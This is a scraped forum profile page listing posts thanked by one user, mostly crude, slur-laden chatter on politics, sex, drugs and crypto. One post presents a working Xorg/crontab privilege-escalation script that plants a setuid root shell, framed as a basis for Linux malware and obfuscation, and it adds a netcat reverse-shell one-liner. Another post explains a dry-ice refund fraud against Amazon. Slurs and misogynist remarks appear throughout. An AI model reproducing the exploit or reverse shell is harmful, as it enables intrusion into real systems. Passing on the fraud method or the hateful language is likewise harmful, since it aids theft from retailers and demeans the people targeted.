User Controls
Posts That Were Thanked by Cowboy2013
-
2021-08-15 at 4:25 AM UTC in Anybody who isn't vaccinated by this point is fucking retarded.
-
2021-08-12 at 6:26 PM UTC in Afghanistan collapsing to Taliban, globalists leaving Kabul like SaigonThe terrorist regime which did 9/11 is finally fleeing Afghanistan
https://www.zerohedge.com/geopolitical/us-considering-possible-evacuation-kabul-embassy-taliban-moves
https://twitter.com/SaraWahedi
I find this hilarious, some woke Afghan female CEO and WEF "Global Shaper" drugged up on benzos running around worrying about what happens when the Taliban get to her swanky mansion.
I can imagine it being really interesting to see how everyone reacts. It must be like Berlin in 1945. -
2021-08-03 at 2:54 PM UTC in We haven't been on a date but she is carrying my child.
-
2021-08-03 at 1:15 PM UTC in US Govt to regulate and tax cryptowe already pay fucking taxes on them, how do you think we buy them in the first place? on top of all the transfering fees and other overheads, we already lose 10% on every damn transaction every time we need to convert it to dollars unless we trade under the table.
fucking greedy cunts.
they can ban all they want, they wont stop the adoption, look how far banning online piracy got them.
what really scares me is elon musks attempt to monopolize the entire internet. then he could intercept all crypto transactions, the fucking cunt. -
2021-08-03 at 12:52 PM UTC in Why is vagina more valuable than penis?because you only need one penis to repopulate a village with 100 vaginas, you cant do the same with one vagina and 100 penises.
this is why for all history the cunt has been put on a pedestal. this white knighting is a natural instinct, it was preservation of our species.
as for circumcision, just take a fucking shower, not difficult is it? -
2021-08-03 at 10:13 AM UTC in We haven't been on a date but she is carrying my child.
Originally posted by General Butt.Naked Dont worry bro its getting aborted in a month when he refuses to pony up $ for prenatal vitamins and she realizes the grave miscalculation shes made
trapping a cuck with a child is never a miscalculation, she is guaranteed an income for 20 years and lots of free handouts from the gubmint. its any bitch's trump card -
2021-08-01 at 2:26 PM UTC in Fuck for Forest (porn)One of the weirdest pay sites. This site is basically a bunch of hippies fucking to raise money to save the planet.
https://www.fuckforforest.com/
https://en.wikipedia.org/wiki/Fuck_for_Forest -
2021-07-30 at 3:28 PM UTC in My Glock is my hoe. And my hoe go everywhere I go.
-
2021-07-30 at 12:24 PM UTC in I dont get what his point is here guyswhy do you care what this gremlin thinks
-
2021-07-30 at 9:25 AM UTC in Sydney: Army to enforce lockdownLol, just like the orthodox jedis in April 2019
-
2021-07-30 at 2:56 AM UTC in I genuinely like CandyRein
Originally posted by Chairman Takeshi Kaga Your personality is too weak to pressure candyrein into anything.
SHut up bitch YOU ONLY LIVE ONCE and lets admit you aren't gonna find any good quality stuff round here so this is your only chance to have a clean ride.
Originally posted by Donald Trump Congtats, the man who put it in my hood.
You buy it! You own it!
OTOH it's not like there was anyone in kyiv to tell you "OK, you own such".
There is no one in moscow to yell you "OK, you own such".
How do you respect someone who stands behind you?
Shut up bitch you only live once. Doesn't matter if you are a russian dirt farmer or a chinese bush meat hunter because this is the Molecules of the holy creator a blessing onto humanity and a gift, do not take a drug to get high but take it to appreciate the experience of being alive in a universe where your brain can even process the chemicals and make you feel that way. There is bad with every good but if you trust in God you can get through anything namaste -
2021-07-30 at 2:47 AM UTC in I genuinely like CandyRein
-
2021-07-29 at 7:27 AM UTC in I genuinely like CandyReinwho the fuck asked
-
2021-07-28 at 10:44 AM UTC in The only shitty thing about coke straight from the brick.
-
2021-07-24 at 7:24 AM UTC in Sh/Bash based malware for *Nix.Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.
So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.
What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.
Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.
Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.
Here's an example.
#!/bin/bash
# There are a bunch of vulns in the Xorg server and related utils like
#
# X.Org xorg-x11-xfs - Local Race Condition
# xorg-x11-server - 'inittab Local Privilege Escalation
#
# And much more, we're gonna do the second one as an example
#
# When ##!!## occurs in the script i got some annotations below
#
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/x_orgasm
# prepare your anus
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg ##!!##_4
sleep 120
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
# Start elevated Sh
/usr/local/bin/pwned
##!!##_1
Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.
Alternatively we could ship a shell in Asm with the payload up top.
##!!##_2
/tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.
/usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x
##!!##_3
The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.
Obfuscation
There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.
String/Hex Hash, 1 Iteration
Token/ForCode, 1 Iteration
Find the result here
Or if you prefer a picture check the spoiler out below.
Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.
I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:
#!/usr/bin/env -S sh\_"umask\_700"\_-f
# BTW This is legal right ^
#
# I'm U_masking because i am writing stuff out
# Under a specific user account
buff_ops()
{ # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
cmd=$0
arg=$1
mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops CMD ARG # <- is what i want
I figured it should be good since stuff like this works also:
rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x
Thicc threads niggas. One on low level security and dev incoming soon as well. -
2021-07-20 at 1:55 PM UTC in Ways around not getting a fire stick or smart tvKodi is still a thing
-
2021-07-20 at 1:01 PM UTC in NIS fitness clubI had a 4 day old boiled egg for breakfast.
-
2021-07-20 at 11:46 AM UTC in Dry icing postal fraud (eg Amazon)This is genius - when returning electronics to amazon you put dry ice into a box and send it, making sure to insure it and get proof of postage, including weight. The dry ice evaporates while the box is in transit, so amazon receive an empty box, and assume the item was stolen in transit.
https://sinister.ly/Thread-Amazon-advance-refund--131758 -
2021-07-20 at 9:39 AM UTC in Why breaking bad and the wire are the best showsby legal I mean non regulated
-
2021-07-20 at 4:49 AM UTC in Yanks shilling for revolution in Cuba makes no sense